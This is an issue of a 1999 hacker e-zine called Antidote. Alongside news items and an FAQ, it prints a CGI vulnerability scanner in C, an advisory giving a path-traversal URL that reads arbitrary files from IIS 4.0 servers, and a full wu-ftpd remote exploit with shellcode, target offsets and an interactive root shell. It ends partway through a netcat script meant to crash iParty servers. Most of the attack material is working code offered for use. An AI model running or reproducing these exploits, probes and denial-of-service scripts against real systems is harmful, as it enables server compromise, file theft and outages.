Volume 2 Issue 3 5/10/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote ------------------------------ Here is another issue of Antidote that has been released. Right now we have over 415 subscribers and getting more and more subscribers everyday. We are very sorry to say that we are not going to be sending Antidote as a attchment anymore because we have gotton so many subscribers that our mail server is going ape shit when we send them (we don't have a mail server just for Antidote). What we are going to start to do is just e-mail everyone the URL as to where they can download the new issue of Antidote. So you will start recieving e-mails about ever week telling you that a new issue of Antidote has been released and where you can get it. Sorry if this is an inconvience to anyone, but it is such a hassle to send this as an attachment cause of the mail server. The last issue that we sent as an attchment took us over 2 and a half hours to send to all of the users because of problems and the mail server kept crashing because of it. At Antidote, we never ask anything from anyone except articles in wich is optional, but now, if you could please visit our sponsor because we have to pay for the domain (www.thepoison.org) and it is getting to be to expensive to keep it up, though we don't want to take it down. So please take 2 seconds out of your time and please visit: http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242 Keep in mind that we are asking 2 seconds of your time to go to our sponsor in wich this e-zine took us over a week to write. Thats the least you can do. Take 2 seconds and we take a week. --=\\Contents\\=-- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News & Exploits 1.01 - Army Survival Training 1.02 - Free e-mail isn't Safe? 1.03 - CGIchk 1.04 - IIS 4.0 1.05 - wu-ftpd 1.06 - ippooper 2.00 - Misc 2.01 - Understanding a Computer Virus 2.02 - Dropping Phonelines 2.03 - Cold Fusion Scanner ------------------------------ --=\\0.00\\=-- 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve Antidote the second we release it and it will be sent as an attachments > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and We are sorry for the Misunderstanding. Well, here are the shout outs Duece ox1dation Lord Oak Forlorn Altomo 0dnek PBBSER HNN [www.hackernews.com] Thepoison.org Retribution 403-security.org EazyMoney Like we said above, if we forgot you and/or you think you should be added, please e- mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) --=\\1.00\\=-- 1.01 --=\\Army Survival Training\\=-- [www.fcw.com] BY DANIEL VERTON (dan_verton@fcw.com) SALT LAKE CITY -- The Army this fall plans to offer an online graduate-level training course on information systems survivability, teaching engineers to develop systems capable of surviving any kind of technical glitch and network attack. The new 14-week Infosurv course will be offered through the University of Maryland as an online, distance-learning initiative sponsored by the Army Research Laboratory in Adelphi, Md. During the course, students with a basic engineering background will build on their education with instruction on reliability, security and performance risks that must be addressed early in the life cycle of an information system. According to Lt. Col. Paul Walczak, senior computer scientist at the Army Research Laboratory, the concept of Infosurv has been around for about 10 years, growing out of research conducted at the Army Research Laboratory. Survivability, Walczak said, can best be defined as a system's ability to withstand hardware faults, software flaws, network attacks by hackers and electromagnetic interference. When one of these types of failures brings a system or a portion of a system down, the rest of the information infrastructure must be capable of operating, he said. "This is a serious attempt by the Army Research Lab to institutionalize the concept," Walczak said. Until now, reliability, survivability and security have been features that systems developers have "bolted on" after the development process started, he said. The goal is to build these requirements into the system design before development work begins, he said. The Army plans to transmit live courses each Thursday from a lecture room on the College Park, Md., campus to as many as 16 satellite locations. "We plan to beam this course out to as many sites as are interested in it," said Walczak, who noted that the University of Tennessee, Pennsylvania State University and Harvard University also have expressed interest in taking part in future courses. Peter Neumann, principal scientist at the Computer Science Laboratory at SRI International and the principal investigator for Infosurv research, will be the primary instructor for the course. The course will act as the core course in a new four-course masters-level certificate program in survivable systems, and it also can be used as credit toward a regular degree program. http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html ------------------------------ 1.02 --=\\Free E-mail isn't safe?\\=-- [comments by Lord Oak] As we all know, hotmail and yahoo's free e-mail service has had a lot of vulnerabilities and security problems in the past. We know that the vulnerabilities are old, but we thought that this article was a good one to explain the "danger" your e-mail might be in if you use hotmail, yahoo or any other web- based free e-mail. [www.eurekalert.org] Free Web-based e-mail services are vulnerable to hackers, according to an analysis by the Internet Security Advisors Group, a consultancy in Severna Park, Maryland. In its security probe, ISAG focused on the three biggest and most firmly established Web-based free e-mail services: Microsoft's Hotmail, YahooMail and Excite Mail. It found that all three failed to provide a basic security feature that helps keep hackers out. The major mistake made by all the service providers was to allow users an unlimited number of attempts to log on, rather than locking them out after a couple of attempts if they got the password wrong. This, says Ira Winkler, president of ISAG, makes it possible for hackers to guess a password by brute force-using what is known as an automated dictionary attack, which tries vast numbers of different passwords until the correct one is found. This, Winkler says, is a basic information security issue the service providers should have got right. In addition, ISAG found that many Web-based e-mail systems also fail to encrypt their passwords when they are sent over the Net, making them easy prey for hackers to intercept. Some hackers collect passwords, logging into e- mail accounts and sending bogus messages. Last week, Hotmail tightened its security in response to ISAG's findings. Its log-in protocol now incorporates a slight delay when the password is entered. For each wrong attempt the delay increases, making any automated attack take an unfeasibly long time. "There's no impact on members who log in successfully," says Laura Norman, a project manager at Hotmail, "but this should deter potential dictionary attacks." Yahoo has also made changes to its password security system and Excite is believed to be considering the matter http://www.eurekalert.org/releases/ns-fes050499.html ------------------------------ 1.03 --=\\CGIchk\\=-- This is a CGI scanner that scans over 55 KNOWN cgi vulnerabilities. /* ---------------------------------------------------------------------- */ /* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */ /* Tested on Slackware linux with kernel 2.0.35;2.0.36; */ /* FreeBSD 2.2.2-3.1;IRIX 5.3 */ /* Source c0de by [CKS & Fdisk] */ /* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/ /* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */ /* hypoclear of lUSt */ /* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */ /* hey! v0rt-fu if u kewl programmer u must write u own proggi, */ /* and stop modify th1s scanner...(i can do it better and CKS ;) */ /* hmm, remember if u can add 2 CGi to scanner u can't change */ /* real Version number and name.....better go read 'C' Bible ;-) */ /* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */ /* -----------------------------------------------[02:30 04.05.99 UnlG]- */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock,debugm=0; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin; char cgibuff[1024]; char *buff[100]; /* Don't u think 100 is enought? ;-)*/ char *cginame[100]; /* Don't u think 100 is enought? */ buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */ buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n"; buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n"; buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n"; buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n"; buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n"; buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n"; buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n"; buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n"; buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n"; buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n"; buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n"; buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n"; buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n"; buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n"; buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n"; buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n"; buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n"; buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n"; buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n"; buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n"; buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n"; buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n"; buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n"; buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n"; buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n"; buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n"; buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n"; buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n"; buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n"; buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n"; buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n"; buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n"; buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n"; buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n"; buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n"; buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n"; buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n"; buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n"; buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n"; buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n"; buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n"; buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n"; buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n"; buff[52] = "GET /search97.vts HTTP/1.0\n\n"; buff[53] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi , rule? ;-) */ cginame[1] = "UnlG - backd00r "; cginame[2] = "THC - backd00r "; cginame[3] = "phf..classic :) "; cginame[4] = "Count.cgi "; cginame[5] = "test-cgi "; cginame[6] = "nph-test-cgi "; cginame[7] = "php.cgi "; cginame[8] = "handler "; cginame[9] = "webgais "; cginame[10] = "websendmail "; cginame[11] = "webdist.cgi "; cginame[12] = "faxsurvey "; cginame[13] = "htmlscript "; cginame[14] = "pfdisplay "; cginame[15] = "perl.exe "; cginame[16] = "wwwboard.pl "; cginame[17] = "www-sql "; cginame[18] = "view-source "; cginame[19] = "campas "; cginame[20] = "aglimpse "; cginame[21] = "glimpse "; cginame[22] = "man.sh "; cginame[23] = "AT-admin.cgi "; cginame[24] = "filemail.pl "; cginame[25] = "maillist.pl "; cginame[26] = "jj "; cginame[27] = "info2www "; cginame[28] = "files.pl "; cginame[29] = "finger "; cginame[30] = "bnbform.cgi "; cginame[31] = "survey.cgi "; cginame[32] = "AnyForm2 "; cginame[33] = "textcounter.pl "; cginame[34] = "classifields.cgi"; cginame[35] = "environ.cgi "; cginame[36] = "service.pwd "; cginame[37] = "users.pwd "; cginame[38] = "authors.pwd "; cginame[39] = "administrators "; cginame[40] = "shtml.dll "; cginame[41] = "shtml.exe "; cginame[42] = "args.bat "; cginame[43] = "uploader.exe "; cginame[44] = "bdir - samples "; cginame[45] = "CGImail.exe "; cginame[46] = "newdsn.exe "; cginame[47] = "fpcount.exe "; cginame[48] = "openfile.cfm "; cginame[49] = "exprcalc.cfm "; cginame[50] = "dispopenedfile "; cginame[51] = "sendmail.cfm "; cginame[52] = "search97.vts "; cginame[53] = "carbo.dll "; if (argc<2) { printf("\n [-- CGI Checker 1.33. Modified by su1d sh3ll //UnlG --]"); printf("\nusage : %s host ",argv[0]); printf("\n Or : %s host -d for debug mode\n\n",argv[0]); exit(0); } if (argc>2) { if(strstr("-d",argv[2])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n\t [ Press any key to check out the httpd version...... ]\n"); getchar(); /* CKS sorry, but ur new piece of code don't work :-( */ send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n"); getchar(); while(count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/ { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("Searching for %s : ",cginame[count]); for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) printf("Found !! ;)\n"); else printf("Not Found\n"); if(debugm==1) { printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff); printf("Press any key to continue....\n"); getchar(); } close(sock); } printf("...have a nice hack... ;-)\n"); } ------------------------------ 1.04 --=\\IIS 4.0\\=-- [www.l0pht.com] -Description Internet Information Server (IIS) 4.0 ships with a set of sample files to help web developers learn about Active Server Pages (ASP). One of these sample files, showcode.asp, is designed to view the source code of the sample applications via a web browser. The showcode.asp file does inadequate security checking and allows anyone with a web browser to view the contents of any text file on the web server. This includes files that are outside of the document root of the webserver. Many ecommerce web servers store transaction logs and other customer information such as credit card numbers, shipping addresses, and purchase information in text files on the web server. This is the type of data that could be accessed with this vulnerability. The L0pht would like to thank Parcens for doing the initial research on this problem. -Details The showcode.asp file is installed by default at the URL: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp It takes 1 argument in the URL, which is the file to view. The format of this argument is: source=/path/filename So to view the contents of the showcode.asp file itself the URL would be: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp This looks like a fairly dangerous sample file. It can view the contents to only allow the viewing of the sample files which were in the '/msadc' directory on the system. The problem is the security check does not test for the '..' characters within the URL. The only checking done is if the URL contains the string '/msadc/'. This allows URLs to be created that view, not only files outside of the samples directory, but files anywhere on the entire file system that the web server's document root is on. For example, a URL that will view the contents of the boot.ini file, which is in the root directory of an NT system is: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini This URL requires that IIS 4.0 was installed in its default location. -Solution For production servers, sample files should never be installed so delete the entire /msadc/samples directory. If you must have the showcode.asp capability on development servers the showcode.asp file should be modified to test for URLs with '..' in them and deny those requests. For specific questions about this advisory, please contactweld@l0pht.com http://www.l0pht.com/advisories.html ------------------------------ 1.05 --=\\wu-ftpd\\=-- /* * Remote/local exploit for wu-ftpd [12] through [18] * gcc w00f.c -o w00f -Wall -O2 * * Offsets/padding may need to be changed, depending on remote daemon * compilation options. Try offsets -5000 to 5000 in increments of 100. * * Note: you need to use -t >0 for -any- version lower than 18. * Coded by smiler and cossack */ #include #include #include #include #include #include #include #include #include #include #include /* In a beta[12-17] shellcode_A overflow, we will not see responses to our commands. Add option -c (use chroot code) to fix this. */ unsigned char hellcode_a[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20" "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd" "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff" "\x0f\x42\x49\x4e\x0f\x53\x48"; unsigned char hellcode_b[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80" "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e" "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31" "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03" "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89" "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d" "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80" "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31" "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; char *Fgets(char *s,int size,FILE *stream); int ftp_command(char *buf,int success,FILE *out,char *fmt,...); int double_up(unsigned long blah,char *doh); int resolv(char *hostname,struct in_addr *addr); void fatal(char *string); int usage(char *program); int tcp_connect(struct in_addr host,unsigned short port); int parse_pwd(char *in,int *pwdlen); void RunShell(int thesock); struct type { unsigned long ret_address; unsigned char align; /* Use this only to offset \xff's used */ signed short pad_shift; /* how little/much padding */ unsigned char overflow_type; /* whether you have to DELE */ char *name; }; /* ret_pos is the same for all types of overflows, you only have to change the padding. This makes it neater, and gives the shellcode plenty of room for nops etc */ #define RET_POS 190 #define FTPROOT "/home/ftp" /* the redhat 5.0 exploit doesn't work at the moment...it must be some trite error i am overlooking. (the shellcode exits w/ code 0375) */ struct type types[]={ { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", }, { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", }, { 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", }, { 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", }, { 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", }, { 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", }, { 0,0,0,0,NULL } }; struct options { char start_dir[20]; unsigned char *shellcode; unsigned char chroot; char username[10]; char password[10]; int offset; int t; } opts; /* Bit of a big messy function, but hey, its only an exploit */ int main(int argc,char **argv) { char *argv0,ltr; char outbuf[1024], inbuf[1024], ret_string[5]; int pwdlen,ctr,d; FILE *cin; int fd; struct in_addr victim; argv0 = strdup(argv[0]); *opts.username = *opts.password = *opts.start_dir = 0; opts.chroot = opts.offset = opts.t = 0; opts.shellcode = hellcode_a; while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){ switch (d) { case 'c': opts.shellcode = hellcode_b; opts.chroot = 1; break; case 's': strcpy(opts.start_dir,optarg); break; case 'o': opts.offset = atoi(optarg); break; case 't': opts.t = atoi(optarg); if ((opts.t < 0)||(opts.t>5)) { printf("Dont have that type!\n"); exit(-1); } } } argc -= optind; argv += optind; if (argc < 3) usage(argv0); if (!resolv(argv[0],&victim)) { perror("resolving"); exit(-1); } strcpy(opts.username,argv[1]); strcpy(opts.password,argv[2]); if ((fd = tcp_connect(victim,21)) < 0) { perror("connect"); exit(-1); } if (!(cin = fdopen(fd,"r"))) { printf("Couldn't get stream\n"); exit(-1); } Fgets(inbuf,sizeof(inbuf),cin); printf("%s",inbuf); if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0) fatal("Bad username\n"); if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0) fatal("Bad password\n"); if (*opts.start_dir) if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0) fatal("Couldn't change dir\n"); if (ftp_command(inbuf,257,cin,"PWD\n")<0) fatal("PWD\n"); if (parse_pwd(inbuf,&pwdlen) < 0) fatal("PWD\n"); srand(time(NULL)); printf("Making padding directorys\n"); for (ctr = 0;ctr < 4;ctr++) { ltr = rand()%26 + 65; memset(outbuf,ltr,194); outbuf[194]=0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); } /* Make padding directory */ ctr = 124 - (pwdlen - types[opts.t].align);//180 //ctr = 152 - (pwdlen - types[opts.t].align); ctr -= types[opts.t].pad_shift; if (ctr < 0) { exit(-1); } memset(outbuf,'A',ctr+1); outbuf[ctr] = 0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); memset(outbuf,0x90,195); d=0; for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++) outbuf[ctr] = opts.shellcode[d++]; double_up(types[opts.t].ret_address-opts.offset,ret_string); strcpy(outbuf+RET_POS,ret_string); strcpy(outbuf+RET_POS+strlen(ret_string),ret_string); printf("Press any key to send shellcode...\n"); getchar(); if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (types[opts.t].overflow_type == 1) if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0) fatal("DELE\n"); /* HEH. For type 1 style we add a dele command. This overflow occurs in delete() in ftpd.c. The cause is realpath() in realpath.c not checking bounds correctly, overwriting path[] in delete(). */ RunShell(fd); return(1); } void RunShell(int thesock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(thesock,&rset); FD_SET(STDIN_FILENO,&rset); select(thesock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(thesock,&rset)) { n=read(thesock,recvbuf,1024); if (n <= 0) { printf("Connection closed\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } return; } int double_up(unsigned long blah, char *doh) { int a; unsigned char *ptr,*ptr2; bzero(doh,6); ptr=doh; ptr2=(char *)&blah; for (a=0;a<4;a++) { *ptr++=*ptr2; if (*ptr2==0xff) *ptr++=0xff; ptr2++; } return(1); } int parse_pwd(char *in, int *pwdlen) { char *ptr1,*ptr2; /* 257 "/" is current directory */ ptr1 = strchr(in,'\"'); if (!ptr1) return(-1); ptr2 = strchr(ptr1+1,'\"'); if (!ptr2) return(-1); *ptr2 = 0; *pwdlen = strlen(ptr1+1); /* If its just "/" then it contributes nothing to the RET_POS */ if (*pwdlen==1) *pwdlen -= 1; printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen); return(1); } int tcp_connect(struct in_addr host,unsigned short port) { struct sockaddr_in serv; int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&host,sizeof(struct in_addr)); serv.sin_port = htons(port); serv.sin_family = AF_INET; if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) { return(-1); } return(fd); } int ftp_command(char *buf,int success,FILE *out,char *fmt,...) { va_list va; char line[1200]; int val; va_start(va,fmt); vsprintf(line,fmt,va); va_end(va); if (write(fileno(out),line,strlen(line)) < 0) return(-1); bzero(buf,200); while(1) { Fgets(line,sizeof(line),out); #ifdef DEBUG printf("%s",line); #endif if (*(line+3)!='-') break; } strncpy(buf,line,200); val = atoi(line); if (success != val) return(-1); return(1); } void fatal(char *string) { printf("%s",string); exit(-1); } char *Fgets(char *s,int size,FILE *stream) { char *ptr; ptr = fgets(s,size,stream); //if (!ptr) //fatal("Disconnected\n"); return(ptr); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } int usage(char *program) { fprintf(stderr,"Usage: %s [-c] [-s start_dir]\n",program); fprintf(stderr,"\t[-o offset] [-t type]\n"); fprintf(stderr,"types:\n"); fprintf(stderr,"0 - %s\n", types[0].name); fprintf(stderr,"1 - %s\n", types[1].name); fprintf(stderr,"2 - %s\n", types[2].name); fprintf(stderr,"3 - %s\n", types[3].name); fprintf(stderr,"4 - %s\n", types[4].name); fprintf(stderr,"5 - %s\n", types[5].name); fprintf(stderr,"\n"); exit(0); } /* -EOF- */ ------------------------------ 1.06 --=\\ippooper\\=-- #!/bin/sh # iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom. # iParty is a cute little voice conferencing program still widely used (much to my surprise.) # Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely. # And in some circumstances, this can lead to other Windows screw-ups (incidents included internet # disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times # a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest # (only?) version of iParty/iPartyd was v1.2 # FOR EDUCATIONAL PURPOSES ONLY. if [ "$1" = "" ]; then echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)" echo "In some circumstances can also crash other Windows progs and maybe even Windows itself." echo "Maybe you'll get lucky." echo "" echo "Usage: $0 " echo "Port is probably 6004 (default port)." echo "" echo "Remember: You need netcat for this program to work." echo "If you see something similar to 'nc: command not found', get netcat." else if [ "$2" = "" ]; then echo "I said the port is probably 6004, try that." exit else rm -f ipp00p cat > ipp00p << _EOF_ 